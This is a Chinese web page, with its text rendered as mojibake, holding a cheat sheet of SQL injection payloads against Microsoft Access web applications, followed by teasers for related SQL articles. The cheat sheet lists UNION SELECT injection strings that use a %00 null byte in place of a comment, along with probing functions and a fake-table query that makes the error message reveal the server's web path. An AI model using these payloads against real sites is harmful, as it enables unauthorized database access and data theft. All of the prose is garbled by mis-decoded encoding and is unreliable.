Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

ÕûÀí±È½ÏÈ«µÄAccess SQL×¢Èë²Î¿¼

 Access SQL×¢Èë²Î¿¼
°æ±¾ 0.2.1
(×î½ü¸üР10/10/2007)
Ô­×÷Õß²»Ïê
 
ÃèÊö SQL²éѯ¼°×¢ÊÍ
×¢ÊÍ·û AccessÖÐûÓÐרÃŵÄ×¢ÊÍ·ûºÅ.Òò´Ë"/*", "--"ºÍ"#"¶¼Ã»·¨Ê¹ÓÃ.µ«ÊÇ¿ÉÒÔʹÓÿÕ×Ö·û"NULL"(%00)´úÌæ:
' UNION SELECT 1,1,1 from validTableName%00
 
Óï·¨´íÎóÐÅÏ¢ "[Microsoft][Driver ODBC Microsoft Access]"
¶à¾äÖ´ÐÐ ²»Ö§³Ö.
ÁªºÏ²éѯ AccessÖ§³ÖÁªºÏ²éѯ,UNIONºóµÄfrom¹Ø¼ü×Ö±ØÐëʹÓÃÒ»¸öÒѾ­´æÔڵıíÃû.
¸½Êô²éѯ AccessÖ§³Ö¸½Êô²éѯ(ÀýÈç:"TOP 1"ÓÃÀ´·µ»ØµÚÒ»ÐеÄÄÚÈÝ) :
' AND (SELECT TOP 1 'someData' from validTableName)%00
 
LIMITÖ§³Ö LIMIT²»±»Ö§³Ö,µ«ÊÇÔÚ²éѯÖпÉÒÔÉùÃ÷"TOP N"À´ÏÞÖÆ·µ»ØÄÚÈݵÄÐÐÊý:
' UNION SELECT TOP 3 AttrName from validTableName%00 : ÕâÌõÓï¾ä·µ»Ø(ǰ)3 ÐÐ.
 
Èòéѯ·µ»Ø0ÐÐ Ôڽű¾ÔÚ·µ»ØµÄHTML½á¹ûÖÐÖ»ÏÔʾµÚÒ»¸ö²éѯµÄ½á¹ûµÄʱºò·Ç³£ÓÐÓÃ:
' AND 1=0 UNION SELECT AttrName1,AttrName2 from validTableName%00
 
×Ö·û´®Á¬½Ó ²»Ö§³ÖCONCAT()º¯Êý. ¿ÉÒÔʹÓÃ"&"»ò"+"²Ù×÷À´Á©½ÓÁ½¸ö×Ö·û´®.ÔÚʹÓõÄʱºî±ØÐë¶ÔÕâÁ½¸ö²Ù×÷·û½øÐÐURLencode±àÂë:
' UNION SELECT 'web' %2b 'app' from validTableName%00 : ·µ»Ø"webapp"
' UNION SELECT 'web' %26 'app' from validTableName%00 : ·µ»Ø"webapp"
 
×Ó×Ö·û´® MID()º¯Êý:
' UNION SELECT MID('abcd',1,1) from validTableName%00 : ·µ»Ø "a"
' UNION SELECT MID('abcd',2,1) from validTableName%00 : ·µ»Ø "b"
 
×Ö·û´®³¤¶È LEN()º¯Êý:
' UNION SELECT LEN('1234') from validTableName%00 : ·µ»Ø 4
 
±©WEB·¾¶ ¿ÉÒÔͨ¹ý¶ÔÒ»¸ö²»´æÔÚµÄ¿â½øÐÐSELECT²Ù×÷.Access½«»á»ØÓ¦Ò»Ìõ°üº¬ÓÐÍêÕû·¾¶µÄ´íÎóÐÅÏ¢.:
' UNION SELECT 1 from ThisIsAFakeName.FakeTable%00
 
È¡×Ö·ûµÄASCIIÖµ ASC()º¯Êý:
' UNION SELECT ASC('A') from ValidTable%00 :·µ»Ø65 ('A'µÄASCIIÖµ)
 
ASCIIֵת»»Îª×Ö·û CHR()º¯Êý:
' UNION SELECT CHR(65) from validTableName%00 : ·µ»Ø 'A'
 
IFÓï¾ä ¿ÉÒÔʹÓÃIIF()º¯Êý. Óï·¨ : IIF(condition, true, false) :
' UNION SELECT IIF(1=1, 'a', 'b') from validTableName%00 : ·µ»Ø 'a'
 
ʱ¼ä½Ó¿Ú ²»´æÔÚÀàËÆBENCHMARK()»òSLEEP()µÄº¯Êý,µ«ÊÇ¿ÉÒÔʹÓôóÁ¿(¸ß¸ºÔØ)µÄ²éѯÀ´´ïµ½Õâ¸öЧ¹û.µã»÷ÕâÀï²é¿´²Î¿¼.


Ïà¹ØÎĵµ£º

SQLº¯Êý´óÈ«

 
Ò»¡¢ÄÚ²¿º¯Êý
1¡¢ÄÚ²¿ºÏ¼Æº¯Êý
1£©COUNT£¨*£© ·µ»ØÐÐÊý
2£©COUNT£¨DISTINCT COLNAME£©·µ»ØÖ¸¶¨ÁÐÖÐΨһֵµÄ¸öÊý
3£©SUM£¨COLNAME/EXPRESSION£©·µ»ØÖ¸¶¨Áлò±í´ïʽµÄÊýÖµºÍ£»
4£©SUM£¨DISTINCT COLNAME£© ·µ»ØÖ¸¶¨ÁÐÖÐΨһֵµÄºÍ
5£©AVG£¨COLNAME/EXPRESSION£©·µ»ØÖ¸¶¨Áлò±í´ïʽÖеÄÊýֵƽ¾ùÖµ
6£©AV ......

SQL´¥·¢Æ÷ʵÀý½²½â

SQL´¥·¢Æ÷ʵÀý½²½â
2008-10-31 21:06
SQL´¥·¢Æ÷ʵÀý1
¶¨Ò壺 ºÎΪ´¥·¢Æ÷£¿ÔÚSQL ServerÀïÃæÒ²¾ÍÊǶÔijһ¸ö±íµÄÒ»¶¨µÄ²Ù×÷£¬´¥·¢Ä³ÖÖÌõ¼þ£¬´Ó¶øÖ´ÐеÄÒ»¶Î³ÌÐò¡£´¥·¢Æ÷ÊÇÒ»¸öÌØÊâµÄ´æ´¢¹ý³Ì¡£
      ³£¼ûµÄ´¥·¢Æ÷ÓÐÈýÖÖ£º·Ö±ðÓ¦ÓÃÓÚInsert , Update , Delete ʼþ¡£
   &nbs ......

ÔõÑù²ÅÄÜʵÏÖÅÅÐòÓÅ»¯µÄ²ã´Î¹ØÏµ±íÉè¼Æ_SQL¼¼ÇÉ

 Êý¾Ý²ã´ÎµÄ¸ÅÄî:
Êý¾Ý²ã´ÎÊDZí´ïÊý¾ÝµÄÒ»ÖÖÖØÒª¹ØÏµ£¬ÔÚÊý¾Ý¿âµÄÉè¼ÆÖУ¬È磺×éÖ¯½á¹¹·Ö½â¡¢¹¤×÷ÈÎÎñ·Ö½â¡¢ÐÐÕþÇø»®µÄ·Ö½âµÈ¶¼ÊDzã´Î¹ØÏµÊý¾ÝµÄµäÐÍʵÀý¡£
±í´ï²ã´Î¹ØÏµµÄÊý¾ÝÒ»°ãÐèҪʵÏÖÈçÏÂÊôÐÔ£º

 
1.²ã´ÎµÄ×î´ó¼¶Áª²ã´ÎÊý¡£È磺Öйú£­>ºþÄÏÊ¡->³¤É³ÊÐ->Óê»¨Çø£¬¾ÍÊÇ4²ã¡£
2.ÄÜ·´Ó³Í¬Ò»² ......

¼òµ¥µÄsqlµÇ¼ºÍ×¢²á´æ´¢¹ý³Ì

 Ê×ÏÈÎÒ½¨ºÃÁËÒ»ÕÅÓû§±í±íÖÐÓÐÁ©¸ö×Ö¶Î Ò»¸öÊÇÕ˺ţ¬Ò»¸öÊÇÃÜÂ뵱ȻÕâÀïÎÒдµÄ֪ʶ¼òµ¥µÄµÇ¼ºÜ×¢²á£¬
±íÃ÷ users Óû§±í
×Ö¶Î accountnum  varchar(50) --±íʾÕ˺Å
        password     varchar(50) --±íʾÃÜÂë
µÇ¼´æ´¢¹ý³Ì
create proc use_l ......

Ô¤·ÀSQL×¢Èë¹¥»÷Ö®ÎÒ¼û

1¡¢ SQL×¢Èë¹¥»÷µÄ±¾ÖÊ£ºÈÿͻ§¶Ë´«µÝ¹ýÈ¥µÄ×Ö·û´®±ä³ÉSQLÓï¾ä£¬¶øÇÒÄܹ»±»Ö´ÐС£
2¡¢ Ã¿¸ö³ÌÐòÔ±¶¼±ØÐë¼ç¸ºÆð·ÀÖ¹SQL×¢Èë¹¥»÷µÄÔðÈΡ£
¡¡¡¡ËµÆð·ÀÖ¹SQL×¢Èë¹¥»÷£¬¸Ð¾õºÜÓôÃÆ£¬Õâô¶àÄêÁË´ó¼ÒÒ»Ö±ÔÚÌÖÂÛ£¬Ò²Ò»Ö±ÔÚÕùÂÛ£¬¿ÉÊǵ½ÁËÏÖÔÚËÆºõ»¹ÊÇûÓж¨ÂÛ¡£µ±²»ÖªµÀ×¢ÈëÔ­ÀíµÄʱºò»á¾õµÃºÜÉñÆæ£¬Ôõô¾Í±»×¢ÈëÁËÄØ£¿ ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ